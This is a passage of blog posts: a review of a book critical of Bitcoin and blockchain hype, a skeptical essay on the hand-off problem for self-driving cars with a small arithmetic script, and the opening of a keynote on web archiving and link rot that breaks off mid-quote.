Sensible companies pay a lot of attention to their sysadmins' input when it comes to deploying new technologies.<br /><br />Gerard's <a href="https://smile.amazon.com/Attack-50-Foot-Blockchain-Contracts-ebook/dp/B073CPP581/ref=sr_1_1"><i>Attack of the 50 Foot Blockchain: Bitcoin, Blockchain, Ethereum &amp; Smart Contracts</i></a> is a must-read, massively sourced corrective to the hype surrounding cryptocurrencies and blockchain technology. Below the fold, some tidbits and commentary. Quotes not preceded by links are from the book, and I have replaced some links to endnotes with direct links.<br /><a name='more'></a><br />Gerard's overall thesis is that the hype is driven by ideology, which has resulted in cult-like behavior that ignores facts, such as:<br /><blockquote class="tr_bq">Bitcoin ideology assumes that inflation is a purely monetary phenomenon that can only be caused by printing more money, and that Bitcoin is immune due to its strictly limited supply. This was demonstrated trivially false when the price of a bitcoin dropped from $1000 in late 2013 to $200 in early 2015 - 400% inflation - while supply only went up 10%.</blockquote>There's recent evidence for this in the collapse of the SegWit2x proposal to improve Bitcoin's ability to scale. As <a href="https://arstechnica.com/tech-policy/2017/11/bitcoin-compromise-collapses-leaving-future-growth-in-doubt/">Timothy B Lee writes</a>:<br /><blockquote class="tr_bq">There's a certain amount of poetic justice in the fact that leading Bitcoin companies trying to upgrade the Bitcoin network were foiled by a populist backlash. Bitcoin is as much a political movement as it is a technology project, and the core idea of the movement is a skepticism about decisions being made behind closed doors.</blockquote>Gerard quotes <a href="http://p2pfoundation.ning.com/forum/topics/bitcoin-open-source">Satoshi Nakamoto's release note for Bitcoin 0.1</a>:<br /><blockquote class="tr_bq">The root problem with conventional currency is all the trust that's required to make it work. The central bank must be trusted not to debase the currency, but the history of fiat currencies is full of breaches of that trust. Banks must be trusted to hold our money and transfer it electronically, but they lend it out in waves of credit bubbles with barely a fraction in reserve. We have to trust them with our privacy, trust them not to let identity thieves drain our accounts. Their massive overhead costs make micropayments impossible.</blockquote>And points out that:<br /><blockquote class="tr_bq">Bitcoin failed at every one of Nakamoto's aspirations here. The price is ridiculously volatile and has had multiple bubbles; the unregulated exchanges (with no central bank backing) front-run their customers, paint the tape to manipulate the price, and are hacked or just steal their user's funds; and transaction fees and the unreliability of transactions make micropayments completely unfeasible.</blockquote>Instead, Bitcoin is a scheme to transfer money from later to earlier adopters:<br /><blockquote class="tr_bq">Bitcoin was substantially mined early on - early adopters have <i>most</i> of the coins. The design was such that early users would get vastly better rewards than later users for the same effort.<br /><br />Cashing in these early coins involves pumping up the price, then selling to later adopters, particularly in the bubbles. Thus Bitcoin was not a Ponzi or pyramid scheme, but a pump-and-dump. 
Anyone who bought in after the earliest days is functionally the sucker in the relationship.</blockquote>Satoshi Nakamoto mined (but has never used) nearly 5% of all the Bitcoin there will ever be, a stash now notionally worth $7.5B. The distribution of notional Bitcoin wealth is highly skewed:<br /><blockquote class="tr_bq">a <a href="http://www.businessinsider.com/bitcoin-inequality-2014-1">Citigroup analysis from early 2014</a> notes: "47 individuals hold about 30 percent, another 900 hold a further 20%, the next 10,000 about 25% and another million about 20%".</blockquote>Not that the early adopters' stashes are circulating:<br /><blockquote class="tr_bq"><a href="https://doi.org/10.1007/978-3-642-39884-1_2">Dorit Ron and Adi Shamir found in a 2012 study</a> that only 22% of then-existing bitcoins were in circulation at all, there were a total of 75 active users or businesses with any kind of volume, one (unidentified) user owned a quarter of all bitcoins in existence, and one large owner was trying to hide their pile by moving it around in thousands of smaller transactions. </blockquote>In the Citigroup analysis, <a href="http://www.businessinsider.com/bitcoin-inequality-2014-1">Steven Englander wrote</a>:<br /><blockquote>The uneven distribution of Bitcoin wealth may be the price to be paid for getting a rapid dissemination of the Bitcoin payments and store of value technology. If you build a better mousetrap, everyone expects you to profit from your invention, but users benefit as well, so there are social benefits even if the innovator grabs a big share.</blockquote>Well, yes, but in this case the 1% of the population who innovated appear to have grabbed about 80% of the wealth, which is a bit excessive.<br /><br />Since there are very few legal things you can buy with Bitcoin (see Gerard's Chapter 7), this notional wealth is only real if you can convert it into a fiat currency such as USD with which you <i>can</i> buy legal things. There are two problems with doing so.<br /><br />First, Nakamoto's million-Bitcoin hoard is not actually worth $7.5B. It is worth however many dollars other people would pay for it, which would be a whole lot less than $7.5B:<br /><blockquote class="tr_bq">large holders trying to sell their bitcoins risk causing a flash crash; the price is not realisable for any substantial quantity. The market remains thin enough that single traders can send the price up or down $30, and an April 2017 crash from $1180 to 6 cents (due to configuration errors on Coinbase's GDAX exchange) was courtesy of 100 BTC of trades.</blockquote>Second, Jonathan Thornburg was prophetic but not the way he thought:<br /><blockquote class="tr_bq">A week after Bitcoin 0.1 was released, Jonathan Thornburg wrote on the Cryptography and Cryptography Policy mailing list: "To me, this means that no major government is likely to allow Bitcoin in its present form to operate on a large scale."</blockquote>Governments have no problem with people using electricity to compute hashes. As <a href="https://en.wikipedia.org/wiki/Ross_Ulbricht">Dread Pirate Roberts</a> found out, they have ways of making their unhappiness clear when this leads to large-scale purchases of illicit substances. But they get really serious when this leads to large-scale evasion of taxes and currency controls.<br /><br />Governments and the banks they charter like to control their money. The exchanges on which, in practice, almost all cryptocurrency transactions take place are, in effect, financial institutions but are not banks.
To move fiat money to and from users, the exchanges need to use actual banks. This is where governments exercise control, with regulations such as the US Know Your Customer/Anti Money Laundering regulations. These make it very difficult to convert Bitcoin into fiat currency without revealing real identities and thus paying taxes or conforming to currency controls.<br /><br />Gerard stresses that Bitcoin is in practice a Chinese phenomenon, both on the mining side:<br /><blockquote class="tr_bq">From 2014 onward, the mining network was based almost entirely in China, running ASICs on very cheap subsidised local electricity (There has long been speculation that much of this is to evade currency controls - buy electricity in yuan, sell bitcoins for dollars) </blockquote>And on the trading side:<br /><blockquote class="tr_bq">Approximately <a href="https://www.coindesk.com/state-of-bitcoin-blockchain-2016/">95% of on-chain transactions</a> are day traders on Chinese exchanges; Western Bitcoin advocates are functionally a sideshow, apart from the actual coders who work on the Bitcoin core software.</blockquote>Gerard agrees with my analysis in <a href="http://blog.dshr.org/2014/10/economies-of-scale-in-peer-to-peer.html">Economies of Scale in Peer-to-Peer Networks</a> that economics made decentralization impossible to sustain:<br /><blockquote class="tr_bq">Everything about mining is more efficient in bulk. By the end of 2016, 75% of the bitcoin hashrate was being generated in <i>one building</i>,<a href="http://www.newsbtc.com/2016/11/04/bitmain-response-new-mining-center/"> using 140 megawatts</a> - or over half the estimated power used by <i>all</i> of Google's data centres worldwide.</blockquote>This is the one case where I failed to verify Gerard's citation. The <a href="http://www.newsbtc.com/2016/11/04/bitmain-response-new-mining-center/">post he links to at NewsBTC</a> says (my emphasis):<br /><blockquote class="tr_bq">According to available information, the Bitmain Cloud Computing Center in Xinjiang, Mainland China <i>will be</i> a 45 room facility with three internal filters maintaining a clean environment. The 140,000 kW facility will also include independent substations and office space.</blockquote>The post suggests that the facility wasn't to be completed until the following month, and quotes a <a href="https://mobile.twitter.com/petertoddbtc/status/793877455639498752">tweet from Peter Todd</a> (my emphasis):<br /><blockquote class="tr_bq">So that's <i>potentially</i> as much as 75% of the current Bitcoin hashing power in one place</blockquote>Gerard appears to have been somewhat ahead of the game.<br /><br />The most interesting part of the book is Gerard's discussion of Bitfinex, and his explanation for the current bubble in Bitcoin. You need to read the whole thing, but briefly:<br /><ul><li>Bitfinex was based on the code from Bitcoinica, written by a 16-year-old.
The code was a mess.</li><li>As a result, in August 2016 nearly 120K BTC (then quoted at around $68M) was stolen from Bitfinex customer accounts.</li><li>Bitfinex avoided bankruptcy by imposing a 36% haircut across all its users' accounts.</li><li>Bitfinex offered the users "tokens", which they eventually, last April, redeemed for USD at roughly half what the stolen Bitcoins were then worth.</li><li>But by then Bitfinex's Taiwanese banks could no longer send USD wires, because Wells Fargo cut them off.</li><li>So the "USD" were trapped at Bitfinex, and could only be used to buy Bitcoin or other cryptocurrencies on Bitfinex. This caused the Bitcoin price on Bitfinex to go up.</li><li>Arbitrage between Bitfinex and the other exchanges (which also have trouble getting USD out) caused the price on other exchanges to rise.</li></ul>Gerard points out that this mechanism drives the current <a href="https://ftalphaville.ft.com/series/ICOmedy">Initial Coin Offering mania</a>:<br /><blockquote class="tr_bq">The trapped "USD" also gets used to buy other cryptocurrencies - the price of altcoins tends to rise and fall with the price of bitcoins - and this has fueled new ICOs ... as people desperately look for somewhere to put their unspendable "dollars". This got Ethereum and ICOs into the bubble as well.</blockquote>In a November 3 post to <a href="https://davidgerard.co.uk/blockchain/">his blog</a>, Gerard <a href="https://davidgerard.co.uk/blockchain/2017/11/03/news-bitfinex-crypto-withdrawal-problems-sec-vs-celebrity-icos-tapscott-ico-scammers-magic-bubbles/">reports that</a>:<br /><blockquote class="tr_bq">You haven’t been able to get actual money out of Bitfinex since mid-March, but now there are increasing user reports of <a href="https://np.reddit.com/r/bitfinex/comments/7a5z5x/withdrawal_problem/">problems withdrawing cryptos as well</a> (<a href="https://archive.is/Tjfa2">archive</a>). </blockquote>Don't worry, the Bitcoin trapped like the USD at Bitfinex can always be used in the next ICO! Who cares about <a href="https://www.sec.gov/news/public-statement/statement-potentially-unlawful-promotion-icos">the SEC</a>:<br /><blockquote class="tr_bq">Celebrities and others have recently promoted investments in Initial Coin Offerings (ICOs).&nbsp; In the <a href="https://www.sec.gov/litigation/investreport/34-81207.pdf">SEC’s Report of Investigation</a> concerning The DAO, the Commission warned that virtual tokens or coins sold in ICOs may be securities, and those who offer and sell securities in the United States must comply with the federal securities laws.</blockquote>Or <a href="https://www.bloomberg.com/news/articles/2017-09-04/china-central-bank-says-initial-coin-offerings-are-illegal">the Chinese authorities</a>:<br /><blockquote class="tr_bq">The People's Bank of China said on its website Monday that it had completed investigations into ICOs, and will strictly punish offerings in the future while penalizing legal violations in ones already completed. The regulator said that those who have already raised money must provide refunds, though it didn't specify how the money would be paid back to investors. </blockquote>This post can only give a taste of an entertaining and instructive book, well worth giving to the Bitcoin enthusiasts in your life. 
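<br /><br />One piece of Gerard's argument is worth making concrete: the early-adopter skew is baked into Bitcoin's issuance schedule, in which the block subsidy started at 50 BTC and halves every 210,000 blocks, roughly every four years. A minimal sketch of the arithmetic (the era lengths are approximate, since block times vary):<br />
<pre>
# Cumulative Bitcoin issuance by halving era. The 50 BTC initial
# subsidy and the 210,000-block halving interval are protocol
# constants; at ~10 minutes per block, an era lasts about 4 years.

def issuance_by_era(eras=10):
    subsidy = 50.0
    total = 0.0
    for era in range(eras):
        total += 210_000 * subsidy          # coins minted in this era
        print(f"after ~{4 * (era + 1):2d} years: "
              f"{total / 1e6:5.2f}M BTC "
              f"({100 * total / 21e6:4.1f}% of the eventual ~21M)")
        subsidy /= 2                        # the "halving"

issuance_by_era()
</pre>
Half of all the Bitcoin that will ever exist was issued in the first four years, when miners were few and mining was cheap; everyone who arrives later competes for an ever-shrinking subsidy.<br /><br />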
You can also point them to Izabella Kaminska's interview of David Gerard - it's a wonderfully <a href="https://soundcloud.com/user-544122300/gerardpod">skeptical take on blockchain technologies and markets</a>.David.http://www.blogger.com/profile/14498131502038331594noreply@blogger.com15tag:blogger.com,1999:blog-4503292949532760618.post-6983563485280594122017-11-14T08:00:00.004-08:002017-11-14T08:00:01.830-08:00Techno-hype part 1<div style="text-align: center;"><i>Don't, don't, don't, don't believe the hype!</i></div><div style="text-align: center;">Public Enemy</div><br />New technologies are routinely over-hyped because people under-estimate the <a href="http://blog.dshr.org/2017/10/will-hamr-happen.html">gap between a technology that works and a technology that is in everyday use</a> by normal people.<br /><br />You have probably figured out that I'm skeptical of the hype surrounding <a href="http://blog.dshr.org/search/label/bitcoin">blockchain technology</a>. Despite incident-free years spent routinely driving in company with Waymo's self-driving cars, I'm also skeptical of the self-driving car hype. Below the fold, an explanation.<br /><a name='more'></a><br />Clearly, self-driving cars <a href="https://arstechnica.com/cars/2017/10/what-its-like-to-ride-in-a-waymo-driverless-car/">driven by a trained self-driving car driver in Bay Area traffic work fine</a>:<br /><blockquote>We've known for several years now that Waymo's (previously Google's) cars can handle most road conditions without a safety driver intervening. Last year, the company reported that its cars could go about 5,000 miles on California roads, on average, between human interventions. </blockquote><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-p5S9-3uwX9k/Wf-EHFDd3QI/AAAAAAAAEAg/_H6nPYUZhvUYyzZehXKCF4AXh1rDEHulACLcBGAs/s1600/AV-graph-1.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="515" data-original-width="975" height="105" src="https://4.bp.blogspot.com/-p5S9-3uwX9k/Wf-EHFDd3QI/AAAAAAAAEAg/_H6nPYUZhvUYyzZehXKCF4AXh1rDEHulACLcBGAs/s200/AV-graph-1.png" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="https://www.rmi.org/news/safe-self-driving-cars/">Crashes per 100M miles</a></td></tr></tbody></table>Waymo's cars are <a href="https://www.rmi.org/news/safe-self-driving-cars/">much safer than almost all human drivers</a>:<br /><blockquote class="tr_bq">Waymo has logged over two million miles on U.S. streets and has only had fault in <a href="https://www.usatoday.com/story/tech/news/2016/02/29/google-car-hits-bus-first-time-fault/81115258/">one accident</a>, making its cars by far the lowest at-fault rate of any driver class on the road— about <b>10 times lower</b> than our safest demographic of human drivers (60–69 year-olds) and <b>40 times lower</b> than new drivers, not to mention the obvious benefits gained from <a href="http://blog.rmi.org/news/robots-dont-drink-drive/">eliminating drunk drivers</a>.<br /><br />However, Waymo’s vehicles have a knack for getting hit by human drivers. When we look at total accidents (at fault and not), the Waymo accident rate is higher than the accident rate of most experienced drivers ... Most of these accidents are fender-benders caused by humans, with no fatalities or serious injuries.
The leading theory is that Waymo’s vehicles adhere to the letter of traffic law, leading them to brake for things they are legally supposed to brake for (e.g., pedestrians approaching crosswalks). Since human drivers are not used to this lawful behavior, it leads to a higher rate of rear-end collisions (where the human driver is at-fault).</blockquote>Clearly, this is a technology that works. I would love it if my grand-children never had to learn to drive, but even a decade from now I think they will still need to. <br /><br />But, as Google realized some time ago, just being safer on average than most humans almost all the time is not enough for mass public deployment of self-driving cars. Back in June, <a href="https://www.nytimes.com/2017/06/07/technology/google-self-driving-cars-handoff-problem.html">John Markoff wrote</a>:<br /><blockquote class="tr_bq">Three years ago, Google’s self-driving car project abruptly shifted from designing a vehicle that would drive autonomously most of the time while occasionally requiring human oversight, to a slow-speed robot without a brake pedal, accelerator or steering wheel. In other words, human driving was no longer permitted.<br /><br />The company made the decision after giving self-driving cars to Google employees for their work commutes and recording what the passengers did while the autonomous system did the driving. In-car cameras recorded employees climbing into the back seat, climbing out of an open car window, and even smooching while the car was in motion, according to two former Google engineers.<br /><br />“We saw stuff that made us a little nervous,” Chris Urmson, a roboticist who was then head of the project, <a href="https://www.nytimes.com/2014/05/28/technology/googles-next-phase-in-driverless-cars-no-brakes-or-steering-wheel.html">said</a> at the time. He later mentioned in a blog post that the company had spotted a number of “silly” actions, including the driver turning around while the car was moving.<br /><br />Johnny Luu, a spokesman for Google’s self-driving car effort, now called Waymo, disputed the accounts that went beyond what Mr. Urmson described, but said behavior like an employee’s rummaging in the back seat for his laptop while the car was moving and other “egregious” acts contributed to shutting down the experiment. </blockquote><a href="https://www.theregister.co.uk/2017/10/31/google_waymo_ditched_autopilot/">Gareth Corfield at <i>The Register</i> adds</a>:<br /><blockquote class="tr_bq">Google binned its self-driving cars' "take over now, human!" feature because test drivers kept dozing off behind the wheel instead of watching the road, according to reports.<br /><br />"What we found was pretty scary," Google Waymo's boss John Krafcik told <i>Reuters</i> reporters during a recent media tour of a Waymo testing facility. "It's hard to take over because they have lost contextual awareness." ...<br /><br />Since then, <a href="https://uk.reuters.com/article/uk-alphabet-autos-self-driving/google-ditched-autopilot-driving-feature-after-test-user-napped-behind-wheel-idUKKBN1D00QM">said</a> Reuters, Google Waymo has focused on technology that does not require human intervention.</blockquote><a href="https://arstechnica.com/cars/2017/10/what-its-like-to-ride-in-a-waymo-driverless-car/">Timothy B. Lee at <i>Ars Technica</i> writes</a>:<br /><blockquote>Waymo cars are designed to never have anyone touch the steering wheel or pedals. So the cars have a greatly simplified four-button user interface for passengers to use. 
There are buttons to call Waymo customer support, lock and unlock the car, pull over and stop the car, and start a ride. </blockquote>But, during a recent show-and-tell with reporters, they <a href="https://arstechnica.com/cars/2017/10/what-its-like-to-ride-in-a-waymo-driverless-car/">weren't allowed to press the "pull over" button</a>:<br /><blockquote class="tr_bq">a Waymo spokesman tells Ars that the "pull over" button does work. However, the event had a tight schedule, and it would have slowed things down too much to let reporters push it.</blockquote>Google was right to identify the "hand-off" problem as essentially insoluble, because the human driver would have lost "situational awareness".<br /><br />Jean-Louis Gassée has an appropriately <a href="https://mondaynote.com/autonomous-cars-the-level-5-fallacy-247ae9614e14">skeptical take on the technology</a>, based on interviews with Chris Urmson:<br /><blockquote>Google’s Director of Self-Driving Cars from 2013 to late 2016 (he had joined the team in 2009). In a&nbsp;<a href="https://www.apple.com/">SXSW</a>&nbsp;talk in early 2016, Urmson gives a&nbsp;<a href="https://www.youtube.com/watch?v=Uj-rK8V-rik&amp;feature=youtu.be">sobering yet helpful vision</a>&nbsp;of the project’s future, summarized by&nbsp;<a href="https://www.technologyreview.com/contributor/lee-gomes/">Lee Gomes</a> in an&nbsp;<a href="http://spectrum.ieee.org/cars-that-think/transportation/self-driving/google-selfdriving-car-will-be-ready-soon-for-some-in-decades-for-others">IEEE Spectrum article</a>&nbsp;[as always, edits and emphasis mine]:<br /><br /><i>“Not only might it take much longer to arrive than the company has ever indicated — <b>as long as 30 years</b>, said Urmson — but the early commercial versions might well be limited to certain geographies and weather conditions.&nbsp;<b>Self-driving cars are much easier to engineer for sunny weather and wide-open roads</b>, and Urmson suggested the cars might be sold for those markets first.”</i></blockquote>But the problem is actually much worse than either Google or Urmson say. Suppose, for the sake of argument, that self-driving cars three times as good as Waymo's are in wide use by normal people. A normal person would encounter a hand-off once in 15,000 miles of driving, or less than <a href="http://cars.lovetoknow.com/about-cars/how-many-miles-do-americans-drive-per-year">once a year</a>. Driving would be something they'd be asked to do maybe 50 times in their life.<br /><br />Even if, when the hand-off happened, the human was not "climbing into the back seat, climbing out of an open car window, and even smooching" and had full "situational awareness", they would be faced with a situation too complex for the car's software. How likely is it that they would have the skills needed to cope, when the last time they did any driving was over a year ago, and on average they've only driven 25 times in their life? Current testing of self-driving cars hands off to drivers with more than a decade of driving experience, well over 100,000 miles of it.
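<br /><br />The back-of-the-envelope arithmetic behind those numbers is worth spelling out. A minimal sketch (the annual mileage approximates the US average linked above; the 55 years of driving is my assumption):<br />
<pre>
# Rough numbers for the hand-off problem: Waymo reported ~5,000 miles
# between interventions; posit a system three times better, driven by
# someone covering a typical US year's mileage.

MILES_BETWEEN_HANDOFFS = 3 * 5_000  # hypothetical improved system
MILES_PER_YEAR = 13_500             # ballpark US average per driver
YEARS_OF_DRIVING = 55               # assumption: say, ages 20 to 75

per_year = MILES_PER_YEAR / MILES_BETWEEN_HANDOFFS
print(f"hand-offs per year: {per_year:.2f}")                     # ~0.9
print(f"lifetime hand-offs: {per_year * YEARS_OF_DRIVING:.0f}")  # ~50
</pre>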
Such testing bears no relationship to the hand-off problem posed by mass deployment of self-driving technology.<br /><br />Remember the <a href="https://en.wikipedia.org/wiki/Air_France_Flight_447">crash of AF447</a>?<br /><blockquote class="tr_bq">the aircraft crashed after temporary inconsistencies between the airspeed measurements&nbsp;– likely due to the aircraft's pitot tubes being obstructed by ice crystals&nbsp;– caused the autopilot to disconnect, after which the crew reacted incorrectly and ultimately caused the aircraft to enter an aerodynamic stall, from which it did not recover.</blockquote>This was a hand-off to a crew that was highly trained, but had never before encountered a hand-off during cruise. What this means is that unrestricted mass deployment of self-driving cars requires <a href="https://www.caranddriver.com/features/path-to-autonomy-self-driving-car-levels-0-to-5-explained-feature">Level 5 autonomy</a>:<br /><blockquote><b>Level 5 – Full Automation</b><br /><br /><i><b>System capability:&nbsp;</b></i>The driverless car can operate on any road and in any conditions a human driver could negotiate. •<i><b> Driver involvement:&nbsp;</b></i>Entering a destination.</blockquote>Note that Waymo is just starting to <a href="https://www.theatlantic.com/technology/archive/2017/08/inside-waymos-secret-testing-and-simulation-facilities/537648/">work with Level 4 cars</a> (the link is to a fascinating piece by Alexis C. Madrigal on Waymo's simulation and testing program). There are many other difficulties on the way to mass deployment, outlined by <a href="https://arstechnica.com/cars/2017/10/waymo-has-a-big-lead-in-driverless-cars-but-heres-how-they-could-lose-it/2/">Timothy B. Lee at <i>Ars Technica</i></a>. Waymo is, admittedly, already testing Level 4 cars in the <a href="https://www.nytimes.com/2017/11/07/technology/waymo-autonomous-cars.html?_r=0">benign environment of Phoenix, AZ</a>:<br /><blockquote class="tr_bq">Waymo, the autonomous car company from Google’s parent company Alphabet, has started testing a fleet of self-driving vehicles without any backup drivers on public roads, its chief executive officer said Tuesday. The tests, which will include passengers within the next few months, mark an important milestone that brings autonomous vehicle technology closer to operating without any human intervention.</blockquote>But the real difficulty is this. <i>The closer the technology gets to Level 5, the worse the hand-off problem gets, because the human has less experience</i>. Incremental progress in deployments doesn't make this problem go away. Self-driving taxis in restricted urban areas maybe in the next five years; a replacement for the family car, don't hold your breath. My grand-children will still need to learn to drive.<br /><br />David.http://www.blogger.com/profile/14498131502038331594noreply@blogger.com3tag:blogger.com,1999:blog-4503292949532760618.post-29949756621858467192017-11-06T18:00:00.000-08:002017-11-06T18:00:03.895-08:00Keynote at Pacific Neighborhood ConsortiumI was invited to deliver a keynote at the <a href="http://www.pnclink.org/pnc2017/">2017 Pacific Neighborhood Consortium</a> in Tainan, Taiwan. My talk, entitled <i>The Amnesiac Civilization</i>, was based on the <a href="http://blog.dshr.org/2017/03/the-amnesiac-civilization-part-1.html">series of posts</a> earlier this year with the same title. The theme was "Data Informed Society", and my abstract was:<br /><blockquote class="tr_bq">What is the data that informs a society?
It is easy to think that it is just numbers, timely statistical information of the kind that drives Google Maps real-time traffic display. But the rise of text-mining and machine learning means that we must cast our net much wider. Historic and textual data is equally important. It forms the knowledge base on which civilization operates.<br /><br />For nearly a thousand years this knowledge base has been stored on paper, an affordable, durable, write-once and somewhat tamper-evident medium. For more than five hundred years it has been practical to print on paper, making Lots Of Copies to Keep Stuff Safe. LOCKSS is the name of the program at the Stanford Libraries that Vicky Reich and I started in 1998. We took a distributed approach; providing libraries with tools they could use to preserve knowledge in the Web world. They could work the way they were used to doing in the paper world, by collecting copies of published works, making them available to readers, and cooperating via inter-library loan. Two years earlier, Brewster Kahle had founded the Internet Archive, taking a centralized approach to the same problem.<br /><br />Why are these programs needed? What have we learned in the last two decades about their effectiveness? How does the evolution of Web technologies place their future at risk?</blockquote>Below the fold, the text of my talk.<br /><a name='more'></a><h3>Introduction</h3>I'm honored to join the ranks of your keynote speakers, and grateful for the opportunity to visit beautiful Taiwan. You don't need to take notes, or photograph the slides, or even struggle to understand my English, because the whole text of my talk, with links to the sources and much additional material in footnotes, has been posted to my blog.<br /><br />What is the data that informs a society? It is easy to think that it is just numbers, timely statistical information of the kind that drives Google Maps real-time traffic display. But the rise of text-mining and machine learning means that we must cast our net much wider. Historic and textual data is equally important. It forms the knowledge base on which civilization operates.<br /><br /><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-3BM12dYa-Kc/WagqApmpkmI/AAAAAAAAD3M/QL61I52zveQWtCTN6EFiwuQNI8KwwZ_VQCLcBGAs/s1600/Cai-lun.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="469" data-original-width="375" height="200" src="https://1.bp.blogspot.com/-3BM12dYa-Kc/WagqApmpkmI/AAAAAAAAD3M/QL61I52zveQWtCTN6EFiwuQNI8KwwZ_VQCLcBGAs/s200/Cai-lun.jpg" width="159" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="https://en.wikipedia.org/wiki/File:Cai-lun.jpg">Qing dynasty print of Cai Lun</a></td></tr></tbody></table>Ever since 105AD when <a href="https://en.wikipedia.org/wiki/Cai_Lun">Cai Lun (蔡伦)</a> invented the process for making <a href="https://en.wikipedia.org/wiki/History_of_paper">paper</a>, civilizations have used it to record their history and its context in everyday life. Archives and libraries collected and preserved originals. Scribes labored to create copies, spreading the knowledge they contained. 
<a href="https://en.wikipedia.org/wiki/Bi_Sheng">Bi Sheng's (毕昇)</a> invention of movable type in the 1040s AD greatly increased the spread of copies and thus knowledge, as did Choe Yun-ui's (최윤의) <a href="https://en.wikipedia.org/wiki/Choe_Yun-ui">1234 invention of bronze movable type</a> in Korea, <a href="https://en.wikipedia.org/wiki/Johannes_Gutenberg">Johannes Gutenberg's 1439 development of the metal type printing press</a> in Germany, and Hua Sui's (华燧) <a href="https://en.wikipedia.org/wiki/Hua_Sui">1490 introduction of bronze type in China</a>.<sup><a href="http://blog.dshr.org/2017/11/keynote-at-pacific-neighborhood.html#Footnote1">[1]</a></sup><br /><br />Thus for about two millennia civilizations have been able to store their knowledge base on this affordable, durable, write-once, and somewhat tamper-evident medium. For more than half a millennium it has been practical to print on paper, making Lots Of Copies to Keep Stuff Safe. But for about two decades the knowledge base has been migrating off paper and on to the Web.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-yjAQmAjn1lE/WcLaKih7gZI/AAAAAAAAD50/hA4AHmp_0YsmAQmSc75Q5Qoa04fbc7iFwCLcBGAs/s1600/LOCKSS.logo.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" data-original-height="151" data-original-width="151" src="https://1.bp.blogspot.com/-yjAQmAjn1lE/WcLaKih7gZI/AAAAAAAAD50/hA4AHmp_0YsmAQmSc75Q5Qoa04fbc7iFwCLcBGAs/s1600/LOCKSS.logo.png" /></a></div><a href="https://www.lockss.org/">Lots Of Copies Keep Stuff Safe </a>is the name of the program at the Stanford Libraries that Vicky Reich and I started 19 years ago last month. We took a distributed approach to preserving knowledge; providing libraries with tools they could use to continue in the Web world their role in the paper world of collecting copies of published works and making them available to readers. <a href="https://en.wikipedia.org/wiki/Internet_Archive">Two years earlier</a>, <a href="https://en.wikipedia.org/wiki/Brewster_Kahle">Brewster Kahle</a> had founded the <a href="https://www.archive.org/">Internet Archive</a>, taking a centralized approach to the same problem. <br /><br />My talk will address three main questions:<br /><ul><li>Why are these programs needed?</li><li>What have we learned in the last two decades about their effectiveness?</li><li>How does the evolution of Web technology place their future at risk?</li></ul><h3>Why archive the Web? </h3>Paper is a durable medium, but the Web is not. From its earliest days users have experienced "<a href="https://en.wikipedia.org/wiki/Link_rot">link rot</a>", links to pages that once existed but have vanished. Even in 1997 they saw it as a <a href="https://www.nngroup.com/articles/fighting-linkrot/">major problem</a>:<br /><blockquote class="tr_bq"><b>6% of the links on the Web are broken according to a <a href="https://web.archive.org/web/*/www.pantos.org/atw/35654.html">recent survey</a> by Terry Sullivan's <i>All Things Web</i>. Even worse, linkrot in May 1998 was double that found by a similar survey in August 1997.</b><br /><br />Linkrot definitely reduces the usability of the Web, being cited as one of the biggest problems in using the Web by <a href="https://web.archive.org/web/*/https://gvu.gatech.edu/user_surveys/survey-1997-10/graphs/use/Problems_Using_the_Web.html">60% of the users in the October 1997 GVU survey</a>. 
This percentage was up from "only" 50% in the April 1997 survey.<sup><a href="http://blog.dshr.org/2017/11/keynote-at-pacific-neighborhood.html#Footnote4">[4]</a></sup></blockquote><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-eHyJ0eokI5o/WYJTTZ7xMEI/AAAAAAAAD0k/4TpT5H9eM2En3r2x1z9nPo4ulpgsIx0pwCLcBGAs/s1600/LawrenceLinkRot.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="378" data-original-width="819" height="91" src="https://3.bp.blogspot.com/-eHyJ0eokI5o/WYJTTZ7xMEI/AAAAAAAAD0k/4TpT5H9eM2En3r2x1z9nPo4ulpgsIx0pwCLcBGAs/s200/LawrenceLinkRot.png" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="https://doi.org/10.1109/2.901164">Figure 1b</a></td></tr></tbody></table>Research at scale in 2001 by <a href="https://doi.org/10.1109/2.901164">Lawrence <i>et al</i></a> validated this concern. They:<br /><blockquote class="tr_bq">analyzed 270,977 computer science journal papers, conference papers, and technical reports ... From the 100,826 articles cited by another article in the database (thus providing us with the year of publication), we extracted 67,577 URLs. ... Figure 1b dramatically illustrates the lack of persistence of Internet resources. <b>The percentage of invalid links in the articles we examined varied from 23 percent in 1999 to a peak of 53 percent in 1994</b>. </blockquote>The problem is worse than this. Martin Klein and co-authors point out that <a href="https://dx.doi.org/10.1371/journal.pone.0167475">Web pages suffer two forms of decay</a> or reference rot:<br /><blockquote><ul><li><b>Link rot</b>: The resource identified by a URI vanishes from the web. As a result, a URI reference to the resource ceases to provide access to referenced content.</li><li><b>Content drift</b>: The resource identified by a URI changes over time. 
